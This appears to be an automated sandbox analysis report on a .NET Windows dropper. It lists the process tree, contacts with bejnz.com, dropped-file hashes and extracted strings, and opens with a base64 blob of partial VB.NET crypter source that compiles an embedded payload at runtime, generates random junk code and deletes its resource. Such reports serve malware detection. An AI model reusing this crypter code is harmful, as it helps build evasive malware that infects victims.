ZG9taXplKCkgOiBEaW0gYigpIEFzIENoYXIgOiBEaW0gcyBBcyBOZXcgU3lzdGVtLlRleHQuU3RyaW5nQnVpbGRlcigiIikgOiBiID0gIjEyMzQ1Njc4OTAiLlRvQ2hhckFycmF5KCkgOiBGb3IgaSBBcyBJbnRlZ2VyID0gMSBUbyBsZW5naHQgOiBSYW5kb21pemUoKSA6IERpbSB6IEFzIEludGVnZXIgPSBJbnQoKChiLkxlbmd0aCAtIDIpIC0gMCArIDEpICogUm5kKCkpICsgMSA6IHMuQXBwZW5kKGIoeikpIDogTmV4dCA6IFJldHVybiBzLlRvU3RyaW5nDQogICAgRW5kIEZ1bmN0aW9uDQoNCiAgICBGdW5jdGlvbiBUb0Jhc2UoQnlWYWwgU3RyIEFzIFN0cmluZykgQXMgU3RyaW5nDQogICAgICAgIFJldHVybiBDb252ZXJ0LlRvQmFzZTY0U3RyaW5nKEVuY29kaW5nLkRlZmF1bHQuR2V0Qnl0ZXMoU3RyKSkNCiAgICBFbmQgRnVuY3Rpb24NCiAgICBGdW5jdGlvbiBGcm9tQmFzZShCeVZhbCBTdHIgQXMgU3RyaW5nKSBBcyBTdHJpbmcNCiAgICAgICAgUmV0dXJuIEVuY29kaW5nLkRlZmF1bHQuR2V0U3RyaW5nKENvbnZlcnQuRnJvbUJhc2U2NFN0cmluZyhTdHIpKQ0KICAgIEVuZCBGdW5jdGlvbg0KDQoNCiAgICBTdWIgRGVsTWUoKQ0KICAgICAgICBUcnkgOiBJTy5GaWxlLkRlbGV0ZSgiekNvbS5yZXNvdXJjZXMiKSA6IENhdGNoIDogRW5kIFRyeQ0KICAgIEVuZCBTdWINCg0KRW5kIE1vZHVsZQ0KDQpQdWJsaWMgQ2xhc3MgYU5DSGl0RUJjRQ0KDQogICAgUHVibGljIFNoYXJlZCBTdWIgWmFWcVdxc3liYyhCeVZhbCBPdXRwdXQgQXMgU3RyaW5nLCBCeVZhbCBTb3VyY2UgQXMgU3RyaW5nLCBCeVZhbCByZXMgQXMgQm9vbGVhbikNCiAgICAgICAgT24gRXJyb3IgUmVzdW1lIE5leHQNCg0KICAgICAgICBEaW0gQ29tcGlsZXIgQXMgSUNvZGVDb21waWxlciA9IChOZXcgVkJDb2RlUHJvdmlkZXIpLkNyZWF0ZUNvbXBpbGVyKCkNCiAgICAgICAgRGltIFBhcmFtZXRlcnMgQXMgTmV3IENvbXBpbGVyUGFyYW1ldGVycygpDQogICAgICAgIERpbSBjUmVzdWx0cyBBcyBDb21waWxlclJlc3VsdHMNCg0KICAgICAgICBQYXJhbWV0ZXJzLkdlbmVyYXRlRXhlY3V0YWJsZSA9IFRydWUNCiAgICAgICAgUGFyYW1ldGVycy5PdXRwdXRBc3NlbWJseSA9IE91dHB1dA0KDQoNCiAgICAgICAgUGFyYW1ldGVycy5SZWZlcmVuY2VkQXNzZW1ibGllcy5BZGQoIlN5c3RlbS5kbGwiKQ0KICAgICAgICBQYXJhbWV0ZXJzLlJlZmVyZW5jZWRBc3NlbWJsaWVzLkFkZCgiU3lzdGVtLkRhdGEuZGxsIikNCg0KICAgICAgICBJZiByZXMgPSBUcnVlIFRoZW4NCiAgICAgICAgICAgIFBhcmFtZXRlcnMuRW1iZWRkZWRSZXNvdXJjZXMuQWRkKCJ6Q29tLnJlc291cmNlcyIpDQogICAgICAgIEVuZCBJZg0KICAgICAgICBQYXJhbWV0ZXJzLkNvbXBpbGVyT3B0aW9ucyA9ICIvZmlsZWFsaWduOjB4MDAwMDAyMDAgL29wdGltaXplKyAvcGxhdGZvcm06WDg2IC9kZWJ1Zy0gL3RhcmdldDp3aW5leGUiDQoNCiAgICAgICAgY1Jlc3VsdHMgPSBDb21waWxlci5Db21waWxlQXNzZW1ibHlGcm9tU291cmNlKFBhcmFtZXRlcnMsIFNvdXJjZSkNCg0KCQkNCg0KICAgIEVuZCBTdWINCkVuZCBDbGFzcw0KDQpQdWJsaWMgQ2xhc3MgVU5sRFVjd2FhcA0KDQogICAgUHJpdmF0ZSBUaXAgQXMgSW50ZWdlcg0KICAgIFByaXZhdGUgS29saWtvIEFzIEludGVnZXINCg0KICAgIFN1YiBOZXcoQnlWYWwgVHlwZSBBcyBJbnRlZ2VyLCBCeVZhbCBLb2xpa294IEFzIEludGVnZXIpDQogICAgICAgIFRpcCA9IFR5cGUNCiAgICAgICAgS29saWtvID0gS29saWtveA0KICAgIEVuZCBTdWINCg0KICAgIFB1YmxpYyBGdW5jdGlvbiBnTUxNVEtKdXBkKCkgQXMgU3RyaW5nDQogICAgICAgIERpbSBob2xkZXIgQXMgU3RyaW5nID0gU3RyaW5nLkVtcHR5DQogICAgICAgIEZvciBpIEFzIEludGVnZXIgPSAwIFRvIEtvbGlrbw0KICAgICAgICAgICAgSWYgVGlwID0gMSBUaGVuDQogICAgICAgICAgICAgICAgaG9sZGVyID0gaG9sZGVyICYgeFlxZndGZ1NBcyhpKSAmIHZiTmV3TGluZQ0KICAgICAgICAgICAgRWxzZQ0KICAgICAgICAgICAgICAgIGhvbGRlciA9IGhvbGRlciAmIHRSTFN4cnltZWkoaSkgJiB2Yk5ld0xpbmUNCiAgICAgICAgICAgIEVuZCBJZg0KICAgICAgICBOZXh0DQogICAgICAgIFJldHVybiBob2xkZXINCiAgICBFbmQgRnVuY3Rpb24NCg0KICAgIFB1YmxpYyBGdW5jdGlvbiB0UkxTeHJ5bWVpKEJ5VmFsIG5hbWUgQXMgU3RyaW5nKSBBcyBTdHJpbmcNCiAgICAgICAgRGltIEZ1bmsgQXMgTmV3IFN5c3RlbS5UZXh0LlN0cmluZ0J1aWxkZXINCiAgICAgICAgRnVuay5BcHBlbmQodmJOZXdMaW5lICsgIiAgICBQdWJsaWMgU3ViIHZhcjEiICYgbmFtZSAmICIoQnlWYWwgdmFyMiBBcyBTdHJpbmcsIEJ5VmFsIHZhcjMgQXMgU3RyaW5nLCBCeVZhbCB2YXI0IEFzIFN0cmluZykiKQ0KICAgICAgICBGdW5rLkFwcGVuZCh2Yk5ld0xpbmUgKyAiICAgICAgICBEaW0gdmFyNSBBcyBTdHJpbmcoKSA9IHsiInZhcjEiIiwgIiJ2YXIyIiIsICIidmFyMyIiLCAiInZhcjQiIiwgIiJ2YXI1IiJ9IikNCiAgICAgICAgRnVuay5BcHBlbmQodmJOZXdMaW5lICsgIiAgICAgICAgRm9yIEVhY2ggdmFyNiBBcyBTdHJpbmcgSW4gdmFyNSIpDQogICAgICAgIEZ1bmsuQXBwZW5kKHZiTmV3TGluZSArICIgICAgICAgICAgICBEbyBVbnRpbCB2YXI1KDApID0gdmFyMiIpDQogICAgICAgIEZ1bmsuQXBwZW5kKHZiTmV3TGluZSArICIgICAgICAgICAgICAgICAgdmFyMyA9IHZhcjQgJiB2YXIyIikNCiAgICAgICAgRnVuay5BcHBlbmQodmJOZXdMaW5lICsgIiAgICAgICAgICAgICAgICBJZiB2YXI0LkNvbnRhaW5zKHZhcjUoMikpID0gVHJ1ZSBUaGVuIikNCiAgICAgICAgRnVuay5BcHBlbmQodmJOZXdMaW5lICsgIiAgICAgICAgICAgICAgICAgICAgdmFyNiA9IHZhcjQuTGVuZ3RoIC0gMSIpDQogICAgICAgIEZ1bmsuQXBwZW5kKHZiTmV3TGluZSArICIgICAgICAgICAgICAgICAgICAgIFdoaWxlIHZhcjMuTGVuZ3RoID0gMiIpDQogICAgICAgIEZ1bmsuQXBwZW5kKHZiTmV3TGluZSArICIgICAgICAgICAgICAgICAgICAgICAgICBEbyBXaGlsZSB2YXIyLkNvbnRhaW5zKHZhcjUoMSkpIikNCiAgICAgICAgRnVuay5BcHBlbmQodmJOZXdMaW5lICsgIiAgICAgICAgICAgICAgICAgICAgICAgICAgICBFeGl0IFN1YiIpDQogICAgICAgIEZ1bmsuQXBwZW5kKHZiTmV3TGluZSArICIgICAgICAgICAgICAgICAgICAgICAgICBMb29wIikNCiAgICAgICAgRnVuay5BcHBlbmQodmJOZXdMaW5lICsgIiAgICAgICAgICAgICAgICAgICAgRW5kIFdoaWxlIikNCiAgICAgICAgRnVuay5BcHBlbmQodmJOZXdMaW5lICsgIiAgICAgICAgICAgICAgICBFbmQgSWYiKQ0KICAgICAgICBGdW5rLkFwcGVuZCh2Yk5ld0xpbmUgKyAiICAgICAgICAgICAgTG9vcCIpDQogICAgICAgIEZ1bmsuQXBwZW5kKHZiTmV3TGluZSArICIgICAgICAgIE5leHQiKQ0KICAgICAgICBGdW5rLkFwcGVuZCh2Yk5ld0xpbmUgKyAiICAgIEVuZCBTdWIiKQ0KICAgICAgICBEaW0gc3JjIEFzIFN0cmluZyA9IEZ1bmsuVG9TdHJpbmcNCiAgICAgICAgRGltIHZhcnMoKSBBcyBTdHJpbmcgPSB7InZhcjEiLCAidmFyMiIsICJ2YXIzIiwgInZhcjQiLCAidmFyNSIsICJ2YXI2In0NCiAgICAgICAgUmFuZG9taXplKCkNCiAgICAgICAgRm9yIGkgQXMgSW50ZWdlciA9IDAgVG8gdmFycy5MZW5ndGggLSAxDQogICAgICAgICAgICBzcmMgPSBzcmMuUmVwbGFjZSh2YXJzKGkpLCBBKDUpICYgbmFtZSkNCiAgICAgICAgTmV4dA0KICAgICAgICBSYW5kb21pemUoKQ0KICAgICAgICBSZXR1cm4gc3JjDQogICAgRW5kIEZ1bmN0aW9uDQoNCg0KICAgIFB1YmxpYyBGdW5jdGlvbiB4WXFmd0ZnU0FzKEJ5VmFsIG5hbWUgQXMgU3RyaW5nKSBBcyBTdHJpbmcNCiAgICAgICAgRGltIEZ1bmsgQXMgTmV3IFN5c3RlbS5UZXh0LlN0cmluZ0J1aWxkZXINCiAgICAgICAgRnVuay5BcHBlbmQodmJOZXdMaW5lICsgIiAgICBQdWJsaWMgRnVuY3Rpb24gdmFyMSIgJiBuYW1lICYgIihCeVZhbCB2YXIyIEFzIFN0cmluZywgQnlWYWwgdmFyMyBBcyBTdHJpbmcsIEJ5VmFsIHZhcjQgQXMgU3RyaW5nKSBBcyBTdHJpbmciKQ0KICAgICAgICBGdW5rLkFwcGVuZCh2Yk5ld0xpbmUgKyAiICAgICAgICBEaW0gdmFyNSBBcyBTdHJpbmcoKSA9IHsiInZhcjEiIiwgIiJ2YXIyIiIsICIidmFyMyIiLCAiInZhcjQiIiwgIiJ2YXI1IiJ9IikNCiAgICAgICAgRnVuay5BcHBlbmQodmJOZXdMaW5lICsgIiAgICAgICAgRm9yIEVhY2ggdmFyNiBBcyBTdHJpbmcgSW4gdmFyNSIpDQogICAgICAgIEZ1bmsuQXBwZW5kKHZiTmV3TGluZSArICIgICAgICAgICAgICBEbyBVbnRpbCB2YXI1KDApID0gdmFyMiIpDQogICAgICAgIEZ1bmsuQXBwZW5kKHZiTmV3TGluZSArICIgICAgICAgICAgICAgICAgdmFyMyA9IHZhcjQgJiB2YXIyIikNCiAgICAgICAgRnVuay5BcHBlbmQodmJOZXdMaW5lICsgIiAgICAgICAgICAgICAgICBJZiB2YXI0LkNvbnRhaW5zKHZhcjUoMikpID0gVHJ1ZSBUaGVuIikNCiAgICAgICAgRnVuay5BcHBlbmQodmJOZXdMaW5lICsgIiAgICAgICAgICAgICAgICAgICAgdmFyNiA9IHZhcjQuTGVuZ3RoIC0gMSIpDQogICAgICAgIEZ1bmsuQXBwZW5kKHZiTmV3TGluZSArICIgICAgICAgICAgICAgICAgICAgIFdoaWxlIHZhcjMuTGVuZ3RoID0gMiIpDQogICAgICAgIEZ1bmsuQXBwZW5kKHZiTmV3TGluZSArICIgICAgICAgICAgICAgICAgICAgICAgICBEbyBXaGlsZSB2YXIyLkNvbnRhaW5zKHZhcjUoMSkpIikNCiAgICAgICAgRnVuay5BcHBlbmQodmJOZXdMaW5lICsgIiAgICAgICAgICAgICAgICAgICAgICAgICAgICBSZXR1cm4gdmFyMiIpDQogICAgICAgIEZ1bmsuQXBwZW5kKHZiTmV3TGluZSArICIgICAgICAgICAgICAgICAgICAgICAgICAgICAgRXhpdCBGdW5jdGlvbiIpDQogICAgICAgIEZ1bmsuQXBwZW5kKHZiTmV3TGluZSArICIgICAgICAgICAgICAgICAgICAgICAgICBMb29wIikNCiAgICAgICAgRnVuay5BcHBlbmQodmJOZXdMaW5lICsgIiAgICAgICAgICAgICAgICAgICAgRW5kIFdoaWxlIikNCiAgICAgICAgRnVuay5BcHBlbmQodmJOZXdMaW5lICsgIiAgICAgICAgICAgICAgICBFbmQgSWYiKQ0KICAgICAgICBGdW5rLkFwcGVuZCh2Yk5ld0xpbmUgKyAiICAgICAgICAgICAgTG9vcCIpDQogICAgICAgIEZ1bmsuQXBwZW5kKHZiTmV3TGluZSArICIgICAgICAgICAgICBSZXR1cm4gdmFyMiIpDQogICAgICAgIEZ1bmsuQXBwZW5kKHZiTmV3TGluZSArICIgICAgICAgIE5leHQiKQ0KICAgICAgICBGdW5rLkFwcGVuZCh2Yk5ld0xpbmUgKyAiICAgIEVuZCBGdW5jdGlvbiIpDQogICAgICAgIERpbSBzcmMgQXMgU3RyaW5nID0gRnVuay5Ub1N0cmluZw0KICAgICAgICBEaW0gdmFycygpIEFzIFN0cmluZyA9IHsidmFyMSIsICJ2YXIyIiwgInZhcjMiLCAidmFyNCIsICJ2YXI1IiwgInZhcjYifQ0KICAgICAgICBSYW5kb21pemUoKQ0KICAgICAgICBGb3IgaSBBcyBJbnRlZ2VyID0gMCBUbyB2YXJzLkxlbmd0aCAtIDENCiAgICAgICAgICAgIHNyYyA9IHNyYy5SZXBsYWNlKHZhcnMoaSksIEEoNSkgJiBuYW1lKQ0KICAgICAgICBOZXh0DQogICAgICAgIFJhbmRvbWl6ZSgpDQogICAgICAgIFJldHVybiBzcmMNCiAgICBFbmQgRnVuY3Rpb24NCg0KDQogICAgUHVibGljIEZ1bmN0aW9uIEEoQnlWYWwgbGVuZ2h0IEFzIEludGVnZXIpIEFzIFN0cmluZw0KICAgICAgICBSYW5kb21pemUoKSA6IERpbSBiKCkgQXMgQ2hhciA6IERpbSBzIEFzIE5ldyBTeXN0ZW0uVGV4dC5TdHJpbmdCdWlsZGVyKCIiKSA6IGIgPSAiUVdFUlRZVUlPUEFTREZHSEpLTFpYQ1ZCTk1xd2VydHl1aW9wYXNkZmdoamtsenhjdmJubSIuVG9DaGFyQXJyYXkoKSA6IEZvciBpIEFzIEludGVnZXIgPSAxIFRvIGxlbmdodCA6IFJhbmRvbWl6ZSgpIDogRGltIHogQXMgSW50ZWdlciA9IEludCgoKGIuTGVuZ3RoIC0gMikgLSAwICsgMSkgKiBSbmQoKSkgKyAxIDogcy5BcHBlbmQoYih6KSkgOiBOZXh0IDogUmV0dXJuIHMuVG9TdHJpbmcNCiAgICBFbmQgRnVuY3Rpb24NCiAgICBQdWJsaWMgRnVuY3Rpb24gQUIoQnlWYWwgbGVuZ2h0IEFzIEludGVnZXIpIEFzIFN0cmluZw0KICAgICAgICBSYW5kb21pemUoKSA6IERpbSBiKCkgQXMgQ2hhciA6IERpbSBzIEFzIE5ldyBTeXN0ZW0uVGV4dC5TdHJpbmdCdWlsZGVyKCIiKSA6IGIgPSAiMTIzNDU2Nzg5MCIuVG9DaGFyQXJyYXkoKSA6IEZvciBpIEFzIEludGVnZXIgPSAxIFRvIGxlbmdodCA6IFJhbmRvbWl6ZSgpIDogRGltIHogQXMgSW50ZWdlciA9IEludCgoKGIuTGVuZ3RoIC0gMikgLSAwICsgMSkgKiBSbmQoKSkgKyAxIDogcy5BcHBlbmQoYih6KSkgOiBOZXh0IDogUmV0dXJuIHMuVG9TdHJpbmcNCiAgICBFbmQgRnVuY3Rpb24NCg0KDQpFbmQgQ2xhc3MNCg0KDQo=
v2.0.50727
#Strings
<Module>
mscorlib
Microsoft.VisualBasic
MyApplication
MyComputer
MyProject
MyWebServices
ThreadSafeObjectProvider`1
IZVsUOKeVmHoECH
gaNzpMgniiZUoTJ
yDtHZzoyNkgSiYS
YsxxznpepFwMjzv
Microsoft.VisualBasic.ApplicationServices
ApplicationBase
Microsoft.VisualBasic.Devices
Computer
System
Object
.cctor
get_Computer
m_ComputerObjectProvider
get_Application
m_AppObjectProvider
get_User
m_UserObjectProvider
get_WebServices
m_MyWebServicesObjectProvider
Application
WebServices
Equals
GetHashCode
GetType
ToString
Create__Instance__
instance
Dispose__Instance__
get_GetInstance
m_ThreadStaticValue
GetInstance
sXiII00
ojRyn0
tEXzX0
yMkwb0
eBmEo11
gOJUs1
uiyaC1
epmwq1
Deflate_D
System.IO
Stream
getStreamBytesX
dataStr
dataChunks
cdrkE00
apBBn0
IZcHx0
Zavao0
gASCl11
MRLnU1
NuVEv1
bcWsy1
jUPDTrlsCRYMEIX
BOTkF00
RzOLW0
WfqWB0
anybp0
ywdhY11
qwsxh1
ZpEVh1
pMYFG1
lenght
ToBase
FromBase
nLBuCWASPGdlmtk
Output
Source
Koliko
Kolikox
gDeXTfhPdkTGabs
VnXZcrxuaAachIY
ebCGACfWVAXlfJK
System.ComponentModel
EditorBrowsableAttribute
EditorBrowsableState
System.CodeDom.Compiler
GeneratedCodeAttribute
System.Diagnostics
DebuggerHiddenAttribute
Microsoft.VisualBasic.CompilerServices
StandardModuleAttribute
HideModuleNameAttribute
System.ComponentModel.Design
HelpKeywordAttribute
System.Runtime.CompilerServices
RuntimeHelpers
GetObjectValue
RuntimeTypeHandle
GetTypeFromHandle
Activator
CreateInstance
MyGroupCollectionAttribute
System.Runtime.InteropServices
ComVisibleAttribute
ThreadStaticAttribute
CompilerGeneratedAttribute
String
Concat
Contains
get_Length
Conversions
Operators
CompareString
System.Resources
ResourceManager
Delete
ProjectData
Exception
SetProjectError
ClearProjectError
System.Reflection
Assembly
GetExecutingAssembly
GetObject
MethodInfo
get_EntryPoint
MethodBase
Invoke
MemoryStream
System.IO.Compression
DeflateStream
CompressionMode
CopyArray
STAThreadAttribute
DateTime
Random
ProcessStartInfo
ResourceWriter
Process
GetCurrentProcess
ProcessModule
get_MainModule
get_FileName
AddResource
Generate
IDisposable
Dispose
GetTempFileName
Replace
VBMath
Randomize
Strings
StrReverse
SetCreationTime
SetLastAccessTime
SetLastWriteTime
ProcessWindowStyle
set_WindowStyle
set_FileName
set_Arguments
System.Text
StringBuilder
ToCharArray
Conversion
Append
Encoding
get_Default
GetBytes
Convert
ToBase64String
FromBase64String
GetString
ICodeCompiler
CompilerResults
CompilerParameters
VBCodeProvider
CreateCompiler
set_GenerateExecutable
set_OutputAssembly
System.Collections.Specialized
StringCollection
get_ReferencedAssemblies
get_EmbeddedResources
set_CompilerOptions
CompileAssemblyFromSource
CreateProjectError
zCom.resources
CompilationRelaxationsAttribute
RuntimeCompatibilityAttribute
tmp5B68.tmp
tmp5B68.tmp.exe
MyTemplate
8.0.0.0
My.Computer
My.User
My.Application
My.WebServices
4System.Web.Services.Protocols.SoapHttpClientProtocol
Create__Instance__
Dispose__Instance__
WrapNonExceptionThrows
_CorExeMain
mscoree.dll
sXiII0
ojRyn0
tEXzX0
yMkwb0
ilbxU0
eBmEo1
gOJUs1
uiyaC1
epmwq1
juoqm1
cdrkE0
apBBn0
IZcHx0
Zavao0
exkGb0
gASCl1
MRLnU1
NuVEv1
bcWsy1
dJkel1
zCom.resources
gaNzpMgniiZUoTJ
yDtHZzoyNkgSiYS
IZVsUOKeVmHoECH
YsxxznpepFwMjzv
gDeXTfhPdkTGabs
VnXZcrxuaAachIY
ebCGACfWVAXlfJK
nLBuCWASPGdlmtk
jUPDTrlsCRYMEIX
BOTkF0
RzOLW0
WfqWB0
anybp0
fFWnl0
ywdhY1
qwsxh1
ZpEVh1
pMYFG1
DKRcR1
qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM
1234567890
System.dll
System.Data.dll
/filealign:0x00000200 /optimize+ /platform:X86 /debug- /target:winexe
Public Sub var1
(ByVal var2 As String, ByVal var3 As String, ByVal var4 As String)
Dim var5 As String() = {"var1", "var2", "var3", "var4", "var5"}
For Each var6 As String In var5
Do Until var5(0) = var2
var3 = var4 & var2
If var4.Contains(var5(2)) = True Then
var6 = var4.Length - 1
While var3.Length = 2
Do While var2.Contains(var5(1))
Exit Sub
Loop
End While
End If
Loop
Next
End Sub
Public Function var1
(ByVal var2 As String, ByVal var3 As String, ByVal var4 As String) As String
Return var2
Exit Function
Return var2
End Function
QWERTYUIOPASDFGHJKLZXCVBNMqwertyuiopasdfghjklzxcvbnm
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
FileDescription
FileVersion
0.0.0.0
InternalName
tmp5B68.tmp.exe
LegalCopyright
OriginalFilename
tmp5B68.tmp.exe
ProductVersion
0.0.0.0
Assembly Version
0.0.0.0

Process Tree

  • 0452655b38e162bba8903239dccd08ae362ccbca8309762a16908ec94534101e.exe (3012) "C:\Users\Administrator\AppData\Local\Temp\0452655b38e162bba8903239dccd08ae362ccbca8309762a16908ec94534101e.exe"
    • vbc.exe (2064) "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Administrator\AppData\Local\Temp\t8owtf-2.cmdline"
      • cvtres.exe (2404) C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\RESBE30.tmp" "C:\Users\ADMINI~1\AppData\Local\Temp\vbcBE20.tmp"
    • tmpBAD4.tmp.exe (1988) "C:\Users\Administrator\AppData\Local\Temp\tmpBAD4.tmp.exe" C:\Users\Administrator\AppData\Local\Temp\0452655b38e162bba8903239dccd08ae362ccbca8309762a16908ec94534101e.exe

0452655b38e162bba8903239dccd08ae362ccbca8309762a16908ec94534101e.exe, PID: 3012, Parent PID: 2236

default registry file network process services synchronisation iexplore office pdf

vbc.exe, PID: 2064, Parent PID: 3012

default registry file network process services synchronisation iexplore office pdf

cvtres.exe, PID: 2404, Parent PID: 2064

default registry file network process services synchronisation iexplore office pdf

tmpBAD4.tmp.exe, PID: 1988, Parent PID: 3012

default registry file network process services synchronisation iexplore office pdf

TCP

Source Source Port Destination Destination Port
192.168.56.101 49174 44.221.84.105 bejnz.com 80
192.168.56.101 49175 44.221.84.105 bejnz.com 80
192.168.56.101 49176 44.221.84.105 bejnz.com 80
192.168.56.101 49177 44.221.84.105 bejnz.com 80

UDP

Source Source Port Destination Destination Port
192.168.56.101 53179 224.0.0.252 5355
192.168.56.101 49642 224.0.0.252 5355
192.168.56.101 137 192.168.56.255 137
192.168.56.101 61714 114.114.114.114 53
192.168.56.101 56933 114.114.114.114 53
192.168.56.101 138 192.168.56.255 138
192.168.56.101 57665 224.0.0.252 5355
192.168.56.101 51758 114.114.114.114 53
192.168.56.101 52215 114.114.114.114 53

HTTP & HTTPS Requests

No HTTP requests performed.

ICMP traffic

No ICMP traffic performed.

IRC traffic

No IRC requests performed.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Snort Alerts

No Snort Alerts

Name e3b0c44298fc1c14_tmpBAD4.tmp.exe
Size 0.0B
Type empty
MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
CRC32 00000000
ssdeep None
Yara None matched
VirusTotal Search for analysis
Name d7dbe167a7b64a4d_zCom.resources
Filepath C:\Users\Administrator\AppData\Local\Temp\zCom.resources
Size 62.7KB
Processes 3012 (0452655b38e162bba8903239dccd08ae362ccbca8309762a16908ec94534101e.exe)
Type data
MD5 aa4bdac8c4e0538ec2bb4b7574c94192
SHA1 ef76d834232b67b27ebd75708922adea97aeacce
SHA256 d7dbe167a7b64a4d11e76d172c8c880020fe7e4bc9cae977ac06982584a6b430
CRC32 9BF4E1EA
ssdeep None
Yara None matched
VirusTotal Search for analysis
Name f31a57f1c87c0eaf_t8owtf-2.cmdline
Filepath C:\Users\Administrator\AppData\Local\Temp\t8owtf-2.cmdline
Size 282.0B
Processes 3012 (0452655b38e162bba8903239dccd08ae362ccbca8309762a16908ec94534101e.exe)
Type Unicode text, UTF-8 (with BOM) text, with no line terminators
MD5 b9229da33f2c5b3f7cf333a850b2c41e
SHA1 61bdaa173f1906d5f04697a71e4eb6bab2772913
SHA256 f31a57f1c87c0eaf87af21fbb2e97919162e91011fa56c7492747d7c7be6aff7
CRC32 6E07F160
ssdeep None
Yara None matched
VirusTotal Search for analysis
Name 540c53470d2f161d_tmpbad4.tmp.exe
Filepath C:\Users\Administrator\AppData\Local\Temp\tmpBAD4.tmp.exe
Size 78.5KB
Processes 2064 (vbc.exe)
Type PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5 0b62abe3f3cdd090e1c15a74dd23e106
SHA1 752716af79db860dbf230e21579352cbce28a2bf
SHA256 540c53470d2f161d62fe61aeea74d473dbbfc38b7cbbb8525562242ab42cb16b
CRC32 56BD1EE5
ssdeep None
Yara None matched
VirusTotal Search for analysis
Name 81f0355a82878444_t8owtf-2.0.vb
Filepath C:\Users\Administrator\AppData\Local\Temp\t8owtf-2.0.vb
Size 14.9KB
Processes 3012 (0452655b38e162bba8903239dccd08ae362ccbca8309762a16908ec94534101e.exe)
Type Unicode text, UTF-8 (with BOM) text, with very long lines (311), with CRLF line terminators
MD5 aeb8a3193b62726f1939bd5f9d46f221
SHA1 dcab9ff6f639b5ba9c0358f12e5fc6abfd557627
SHA256 81f0355a82878444fa4f6e1edbe2186d3a84f554084d82fd8033707ffdcf10d7
CRC32 307E88BE
ssdeep None
Yara None matched
VirusTotal Search for analysis
Name 3513d406755e39b7_t8owtf-2.out
Filepath C:\Users\Administrator\AppData\Local\Temp\t8owtf-2.out
Size 2.5KB
Processes 3012 (0452655b38e162bba8903239dccd08ae362ccbca8309762a16908ec94534101e.exe) 2064 (vbc.exe)
Type Unicode text, UTF-8 (with BOM) text, with very long lines (378), with CRLF line terminators
MD5 41b6d63ace204ac68c5e43abee733ebe
SHA1 cc98ea9ccf15806b083d93a1b34198833266e36c
SHA256 3513d406755e39b7c0bb012ac27705701dda2aed6d4e006a0f485a73ec8aea76
CRC32 C7C84EFB
ssdeep None
Yara None matched
VirusTotal Search for analysis
Name 44d96a992bfe0ff3_vbcBE20.tmp
Filepath C:\Users\Administrator\AppData\Local\Temp\vbcBE20.tmp
Size 660.0B
Processes 2064 (vbc.exe)
Type MSVC .res
MD5 16faada4ddc1692ccde7dced48202449
SHA1 ef613d0203f3aa19d124af4a1094f5d64cc652a5
SHA256 44d96a992bfe0ff386158f32b5eb133f6ca546907717ba97dd06bf3173290e75
CRC32 1B17CC1C
ssdeep None
Yara None matched
VirusTotal Search for analysis
Name 0452655b38e162bb_0452655b38e162bba8903239dccd08ae362ccbca8309762a16908ec94534101e.exe
Filepath C:\Users\Administrator\AppData\Local\Temp\0452655b38e162bba8903239dccd08ae362ccbca8309762a16908ec94534101e.exe
Size 78.5KB
Type PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5 0931543b10e86f3daaba81c11bc31658
SHA1 51183fa21b3372a2667b29c2d4c15b672336dc1b
SHA256 0452655b38e162bba8903239dccd08ae362ccbca8309762a16908ec94534101e
CRC32 DFEBB89A
ssdeep None
Yara None matched
VirusTotal Search for analysis
Name 611eb0183cfde385_RESBE30.tmp
Filepath C:\Users\Administrator\AppData\Local\Temp\RESBE30.tmp
Size 1.2KB
Processes 2404 (cvtres.exe) 2064 (vbc.exe)
Type Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x416, 9 symbols, created Sat Sep 28 11:01:34 2024, 1st section name ".debug$S"
MD5 4ff08e5c4e1c89af1516727a06153c75
SHA1 6d23c0bf58a88695dcc78745a87736481081dc32
SHA256 611eb0183cfde385e6c6f6bb7e230e1398ff77b8f878d6d38794ef50d12c6027
CRC32 EAFF62A0
ssdeep None
Yara None matched
VirusTotal Search for analysis
Sorry! No dropped buffers.